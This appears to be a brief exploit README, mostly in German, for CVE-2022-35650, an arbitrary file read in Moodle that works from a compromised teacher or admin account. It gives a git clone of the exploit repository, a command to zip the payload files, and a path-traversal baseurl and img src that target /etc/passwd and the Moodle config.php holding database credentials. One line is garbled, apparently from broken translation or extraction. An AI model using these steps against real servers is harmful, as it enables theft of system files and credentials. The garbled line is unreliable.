
Exploit for CVE-2022-35650, a Moodle Arbitrary File Read.
Dies ist ein beliebiges Dateilesen in Moodle.
Sie müssen einen Lehrer- oder Admin-Benutzer kompromittiert haben.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) heruntergeladen wird/etc/passwdWenn Sie die Konfigurationsdatei (mit saftigen Anmeldedaten) lesen möchten, setzen Sie Ihre baseurl in imsmanifest.xml auf Folgendes:
../../../../../../../../../../../var/www/html
und setzen Sie Ihr img src in pool.dat auf:
muc/config.php